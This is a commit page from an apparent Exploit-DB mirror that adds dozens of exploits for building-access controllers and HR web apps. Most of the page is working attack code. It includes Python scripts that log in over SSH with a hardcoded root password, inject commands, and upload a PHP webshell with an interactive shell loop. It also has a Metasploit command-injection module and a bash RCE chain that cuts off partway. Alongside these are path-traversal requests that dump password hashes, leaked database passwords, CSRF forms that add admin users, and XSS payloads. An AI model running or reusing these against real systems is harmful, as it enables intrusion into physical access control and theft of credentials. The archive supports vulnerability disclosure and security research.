bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-11-13

Browse source 
38 changes to exploits/shellcodes

Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path
Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)
Wondershare Application Framework Service - _WsAppService_  Unquote Service Path
eMerge E3 Access Controller 4.6.07 - Remote Code Execution
eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
CBAS-Web 19.0.0 - Information Disclosure
Prima FlexAir Access Control 2.3.38 - Remote Code Execution
Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
eMerge E3 1.00-06 - Unauthenticated Directory Traversal
eMerge E3 1.00-06 - Privilege Escalation
eMerge E3 1.00-06 - Remote Code Execution
eMerge E3 1.00-06 - Cross-Site Request Forgery
Atlassian Confluence 6.15.1 - Directory Traversal
eMerge E3 1.00-06 - Arbitrary File Upload
eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
eMerge50P 5000P 4.6.07 - Remote Code Execution
CBAS-Web 19.0.0 - Remote Code Execution
CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)
CBAS-Web 19.0.0 - Username Enumeration
CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
Joomla 3.9.13 - 'Host' Header Injection
Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
Prima Access Control 2.3.35 - Arbitrary File Upload
Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)
Optergy 2.3.0a - Remote Code Execution
FlexAir Access Control 2.4.9api3 - Remote Code Execution
Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
Optergy 2.3.0a - Username Disclosure
Optergy 2.3.0a - Remote Code Execution (Backdoor)
Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
FlexAir Access Control 2.3.35 - Authentication Bypass
Bematech Printer MP-4200 - Denial of Service
This commit is contained in:
Offensive Security 2019-11-13 05:01:43 +00:00
parent 7e9d444235
commit c8181201fd
39 changed files with 3237 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

31
exploits/alpha/webapps/47633.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7671
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Prima Access Control 2.3.35 Authenticated Stored XSS
# PoC
POST /bin/sysfcgi.fx HTTP/1.1
Host: 192.168.13.37
Connection: keep-alive
Content-Length: 265
Origin: https://192.168.13.37
Session-ID: 10127047
User-Agent: Mozi-Mozi/44.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html, */*; q=0.01
Session-Pc: 2
X-Requested-With: XMLHttpRequest
Referer: https://192.168.13.37/app/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
<requests><request name="CreateDevice"><param name="HwType" value="1000"/><param name="HwParentID" value="0"/><param name="HwLogicParentID" value="0"/><param name="HwName" value=""><script>alert("XSSz")</script>"/></request></requests>

43
exploits/aspx/webapps/47611.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12234
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 of HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
# URL
# ====================
https://<Host:port>/Adrenalin/flexiportal/GeneralInfo.aspx?strAction=Update0%22[Javascript code]22HRMS%22%29%2f%2f1
https://<Host:port>/myadrenalin/flexiportal/GeneralInfo.aspx?strAction=Update11170%22%3balert(%22HRMS%22)%2f%2f155
Parameter
====================
strAction
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12234
https://www.knowcybersec.com/2018/09/first-cve-2018-12234-reflected-XSS.html
Discoverer
====================
Rishu Ranjan

44
exploits/aspx/webapps/47613.txt Normal file
View file

@ -0,0 +1,44 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan (Cy83rl0gger)
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12650
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software.
# The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response.
URL
====================
https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined
Parameter
====================
prntDDLCntrlName
prntFrmName
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12650
https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html
Discoverer
====================
Rishu Ranjan

45
exploits/aspx/webapps/47643.txt Normal file
View file

@ -0,0 +1,45 @@
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.
URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0
Parameter
====================
ReportId
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html
Discoverer
====================
Rishu Ranjan

48
exploits/hardware/remote/47625.py Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
#!/usr/bin/env python
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] root@192.168.1.2:
# Distro Unknown Unknown
# OS: Unknown
# Arch: Unknown
# Version: 0.0.0
# ASLR: Disabled
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov 1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====
from pwn import *
if len(sys.argv) < 2:
print 'Usage: ./e3.py <ip>\n'
sys.exit()
ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()

95
exploits/hardware/remote/47626.rb Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23
#
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linear eMerge E3 Access Controller Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in the Linear eMerge
E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
function allowing arbitrary command execution with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic <gjoko@applied-risk.com> ' # Discovery, Exploit, MSF Module
],
'References' =>
[
[ 'URL', 'https://applied-risk.com/labs/advisories' ],
[ 'URL', 'https://www.nortekcontrol.com' ],
[ 'CVE', '2019-7256']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ ['Linear eMerge E3', { }], ],
'DisclosureDate' => "Oct 29 2019",
'DefaultTarget' => 0
)
)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),
'vars_get' =>
{
'No' => '251',
'door' => '1337'
}
})
if res.code == 200 and res.to_s =~ /PHP\/5.6.23/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'No' => '251',
'door' => "`"+cmd+"`"
}
})
unless res
fail_with(Failure::Unknown, 'Exploit failed!')
end
res
end
def exploit
http_send_command(payload.encoded)
print_status("Sending #{payload.encoded.length} byte payload...")
end
end

20
exploits/hardware/remote/47629.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"

71
exploits/hardware/webapps/47612.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.primasystems.eu/
# Software Link: https://primasystems.eu/flexair-access-control/
# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670
#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
############################################################################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
############################################################################
#
import requests
import sys#####
if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n'
sys.exit()
host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]
url = host+"/bin/sysfcgi.fx"
headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}
payload = ("<requests><request name=\"SetNTPServer\">"
"<param name=\"Server\" value=\"2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|\"/></request></"
"requests>")
requests.post(url, headers=headers, data=payload)
e = requests.get(host+"/app/images/logos/stage.txt")
print e.text

25
exploits/hardware/webapps/47614.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10846
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1
username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email
=======
POST /cbas/index.php?m=auth&a=login HTTP/1.1
username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
=======
GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1

42
exploits/hardware/webapps/47616.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
GET /?c=../../../../../../etc/passwd%00
Host: 192.168.1.2
root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/home/default:
e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh
lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh
curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version
curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue
curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00

21
exploits/hardware/webapps/47618.txt Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: eMerge E3 1.00-06 - Privilege Escalation
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7254, CVE-2019-7259
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
# Escalate:
curl "http://192.168.1.2/?c=webuser&m=update" -X POST -data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1
Disclose:
curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1

60
exploits/hardware/webapps/47619.py Executable file
View file

@ -0,0 +1,60 @@
# Exploit Title: eMerge E3 1.00-06 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
#!/usr/bin/env python
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################
import requests
import sys,os##
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
sys.exit()
ipaddr = sys.argv[1]
print
while True:
try:
cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60')
readreq = requests.get('http://'+ipaddr+'/test.txt')
print readreq.text
if cmd.strip() == 'exit':
print "[+] Erasing read stage file and exiting..."
requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
print "[+] Done. Ba-bye!\n"
break
else: continue
except Exception:
break
sys.exit()

53
exploits/hardware/webapps/47620.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: eMerge E3 1.00-06 - Cross-Site Request Forgery
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7262
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
# Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery
<!-- CSRF Add Super User -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=insert" method="POST">
<input type="hidden" name="No" value="" />
<input type="hidden" name="ID" value="hax0r" />
<input type="hidden" name="Password" value="hax1n" />
<input type="hidden" name="Name" value="CSRF" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Add Super User" />
</form>
</body>
</html>
<!-- CSRF Change Admin Password -->
<html>
<body>
<form action="http://192.168.1.2/?c=webuser&m=update" method="POST">
<input type="hidden" name="No" value="1" />
<input type="hidden" name="ID" value="admin" />
<input type="hidden" name="Password" value="backdoor" />
<input type="hidden" name="Name" value="admin" />
<input type="hidden" name="UserRole" value="1" />
<input type="hidden" name="Language" value="en" />
<input type="hidden" name="DefaultPage" value="sitemap" />
<input type="hidden" name="DefaultFloorNo" value="1" />
<input type="hidden" name="DefaultFloorState" value="1" />
<input type="hidden" name="AutoDisconnectTime" value="24" />
<input type="submit" value="Change Admin Password" />
</form>
</body>
</html>

89
exploits/hardware/webapps/47622.py Executable file
View file

@ -0,0 +1,89 @@
# Exploit Title: eMerge E3 1.00-06 - Arbitrary File Upload
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7257
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC
#####################################################################
#
# lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2
# Starting exploit at 17.01.2019 13:04:17
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id
# Password:
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit
#
# [+] Deleting webshell.php file...
# [+] Done!
#
#####################################################################
import datetime
import requests
import sys#####
import os######
piton = os.path.basename(sys.argv[0])
badge = "/badging/badge_layout_new_v0.php"
shell = "/badging/bg/webshell.php"
if len(sys.argv) < 2:
print "\n\x20\x20[*] Usage: "+piton+" <ipaddress:port>\n"
sys.exit()
ipaddr = sys.argv[1]
vremetodeneska = datetime.datetime.now()
print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S")
print
while True:
try:
target = "http://"+ipaddr+badge
headers = {"User-Agent": "Brozilla/16.0",
"Accept": "anything",
"Accept-Language": "mk-MK,mk;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=----j",
"Connection": "close"}
payload = ("------j\r\nContent-Disposition: form-da"
"ta; name=\"layout_name\"\r\n\r\nwebshel"
"l.php\r\n------j\r\nContent-Disposition"
": form-data; name=\"bg\"; filename=\"we"
"bshell.php\"\r\nContent-Type: applicati"
"on/octet-stream\r\n\r\n<?\nif($_GET['cm"
"d']) {\n system($_GET['cmd']);\n }\n?"
">\n\r\n------j--\r\n")
requests.post(target, headers=headers, data=payload)
cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ")
execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd)
print execute.text
if cmd.strip() == "exit":
print "[+] Deleting webshell.php file..."
requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php")
print "[+] Done!\n"
break
else: continue
except Exception:
print "Error!"
break
sys.exit()

15
exploits/hardware/webapps/47623.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7255
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

278
exploits/hardware/webapps/47624.sh Executable file
View file

@ -0,0 +1,278 @@
# Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7269
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# PoC:
#!/bin/bash
#
# Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07
# Including escalating to root privileges
# CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269
# Advisory: https://applied-risk.com/resources/ar-2019-006
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#
# This script is tested on macOS 10.13.6
# by Sipke Mellema
#
# usage: ./sploit.sh http://target
#
##########################################################################
#
# $ ./sploit.sh http://192.168.1.1
#
#
# . . . . .
# . . . . .
# | |Linear eMerge50 4.6.07| |
# | | | |
# | |Remote code executionz| |
# | | With priv escalation | |
# | | Get yours today | |
# | | | | |
# | | Boomch | |
# . . . . .
# . . . . .
#
#
#
# [*] Checking connection to the target..
# [V] We can connect to the server
# [*] Checking if already infected..
# [V] Target not yet infected..
# [*] Creating custom session file..
# [*] Uploading custom session file..
# [V] Session file active!
# [*] Retrieving CSRF token..
# [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9
# [*] Uploading file..
# [V] File successfully uploaded
# [*] Writing new config..
# [V] Wrote new config, restarting device
# [*] Looks good! Waiting for device to reboot..
# [V] Executing: whoami..
# [V] Username found: root
# [*] Cleaning up uploaded files..
# [*] Removing fake backup file..
# [*] Removing shell script..
# [*] Files removed
#
# [*] If that worked, you can how execute commands via your cookie
# [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi
# [*] Or type commands below ('quit' to quit)
#
# root@http://192.168.1.1$ id
# uid=0(root) gid=0(root) groups=0(root)
# root@http://192.168.1.1$ quit
#
##########################################################################
RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m'
BANNER="
\t . . . . .
\t . . . . .
\t| |${BLUE}Linear eMerge50 4.6.07${RED}| |
\t| |${BLUE} ${RED}| |
\t| |${BLUE}Remote code executionz${RED}| |
\t| |${BLUE} With priv escalation ${RED}| |
\t| |${BLUE} Get yours today ${RED}| |
\t| |${BLUE} | ${RED}| |
\t| |${BLUE} Boomch ${RED}| |
\t . . . . .
\t . . . . .
${NC}
"
printf "\n${RED}${BANNER}\n\n"
function echo_green {
printf "${GREEN}[*] $@${NC}\n"
}
function echo_blue {
printf "${BLUE}[V] $@${NC}\n"
}
function echo_red {
printf "${RED}[-] $@${NC}\n"
}
function show_usage {
echo -en "Usage: ./sploit.sh
"
}
# check arguments
if [ $# -eq 0 ]
then
echo_red "Incorrect parameters"
show_usage
exit
fi
# Define global paramters
VULN_HOST=$1
TEST_CMD="whoami"
# ========================= Vuln 2: Session ID allows path traversal
# Path traversal to session file injected as backup file
SESSION_ID="../web/upload/system/backup.upg"
function run_remote_shell {
